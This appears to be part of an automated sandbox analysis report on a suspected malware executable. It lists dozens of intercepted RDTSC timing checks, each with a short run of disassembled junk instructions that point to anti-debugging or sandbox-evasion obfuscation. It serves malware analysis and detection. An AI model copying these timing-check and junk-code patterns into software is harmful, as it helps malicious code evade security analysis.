Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDDA second address: 80BDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDDE second address: 80BDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDE4 second address: 80BDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81AC3D second address: 81AC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81AAE1 second address: 81AAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81AAE5 second address: 81AB0C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FB4246CBDF5h 0x00000010 jmp 00007FB4246CBDEDh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D8EB second address: 81D8F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D4BE second address: 81D4C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D5E4 second address: 81D5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D5EA second address: 81D617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB4246CBDF1h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FB4246CBDE6h 0x0000001b jl 00007FB4246CBDE6h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D617 second address: 81D61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D61B second address: 81D624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D624 second address: 81D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D62A second address: 81D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 8335B7 second address: 83360D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 js 00007FB424542846h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FB42454284Ah 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007FB424542846h 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 jbe 00007FB424542846h 0x00000027 jmp 00007FB424542857h 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83360D second address: 833613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837FBC second address: 837FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jne 00007FB424542846h 0x00000010 jl 00007FB424542846h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837FD4 second address: 837FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB4246CBDEBh 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB4246CBDE6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837FEC second address: 837FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 836E8C second address: 836EAB instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4246CBDE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4246CBDF3h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 836EAB second address: 836EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FB424542846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 836EC0 second address: 836EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83718D second address: 8371C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB424542856h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB424542854h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837488 second address: 83748C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83748C second address: 837494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AAD4 second address: 83AAEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AAEA second address: 83AB15 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB424542848h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FB42454285Ch 0x00000015 jmp 00007FB424542856h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AB15 second address: 83AB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AB1B second address: 83AB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AC3C second address: 83AC5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007FB4246CBDFBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AC5A second address: 83AC86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB42454284Ch 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007FB424542846h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83C180 second address: 83C189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83C189 second address: 83C191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83C191 second address: 83C197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83F9BA second address: 83F9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB424542846h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83F9C6 second address: 83F9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jbe 00007FB4246CBE01h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB4246CBDEDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00DD2 second address: 4A00E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB42454284Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB42454284Ch 0x00000019 adc si, 8748h 0x0000001e jmp 00007FB42454284Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FB424542858h 0x0000002a xor si, 49A8h 0x0000002f jmp 00007FB42454284Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00E4B second address: 4A00E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00E6F second address: 4A00E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00E82 second address: 4A00EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FB4246CBDECh 0x00000011 popad 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, 5EC8563Fh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0116 second address: 49E014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB424542853h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E014B second address: 49E0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0168 second address: 49E01E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB424542857h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FB424542851h 0x00000016 sub cx, 8F96h 0x0000001b jmp 00007FB424542851h 0x00000020 popfd 0x00000021 movzx esi, di 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 mov ecx, 0E13BA1Bh 0x0000002d popad 0x0000002e push dword ptr [ebp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 jmp 00007FB424542859h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E026B second address: 49E0288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0288 second address: 49E028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, bl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A0068F second address: 4A006A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB4246CBDEDh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006A5 second address: 4A006AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006AB second address: 4A006AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006AF second address: 4A006B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006B3 second address: 4A006E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FB4246CBDEFh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4246CBDF5h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006E4 second address: 4A006EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006EA second address: 4A006F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006F9 second address: 4A006FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A006FD second address: 4A00703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00581 second address: 4A005AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB42454284Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A005AD second address: 4A005B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A005B3 second address: 4A005B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10212 second address: 4A10227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10227 second address: 4A10260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB424542850h 0x00000014 and al, 00000038h 0x00000017 jmp 00007FB42454284Bh 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10260 second address: 4A1027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40581 second address: 4A40585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40585 second address: 4A40589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40589 second address: 4A4058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A4058F second address: 4A40595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40595 second address: 4A40599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A40599 second address: 4A4059D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A4059D second address: 4A405FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FB424542859h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov al, bh 0x00000021 pushfd 0x00000022 jmp 00007FB424542854h 0x00000027 add ecx, 7C5532F8h 0x0000002d jmp 00007FB42454284Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A2019D second address: 4A201A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A201A2 second address: 4A201FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB424542855h 0x0000000a and cx, 49A6h 0x0000000f jmp 00007FB424542851h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FB424542851h 0x0000001e xchg eax, ebp 0x0000001f jmp 00007FB42454284Eh 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A201FF second address: 4A20205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A20205 second address: 4A2020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A2020B second address: 4A2023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FB4246CBDEAh 0x00000010 and dword ptr [eax], 00000000h 0x00000013 jmp 00007FB4246CBDF0h 0x00000018 and dword ptr [eax+04h], 00000000h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A2023C second address: 4A20240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10CEA second address: 4A10D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10D07 second address: 4A10D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB42454284Ah 0x00000009 and ecx, 7398BFF8h 0x0000000f jmp 00007FB42454284Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 jmp 00007FB424542859h 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov ecx, 5671EEB3h 0x00000025 jmp 00007FB424542858h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB42454284Ah 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10D74 second address: 4A10D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A10D78 second address: 4A10D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A20019 second address: 4A2004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 12C2h 0x00000007 jmp 00007FB4246CBDF3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FB4246CBDEBh 0x00000018 pop eax 0x00000019 mov si, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30DA6 second address: 4A30DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30DBB second address: 4A30DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30DC1 second address: 4A30DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A30DC5 second address: 4A30DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
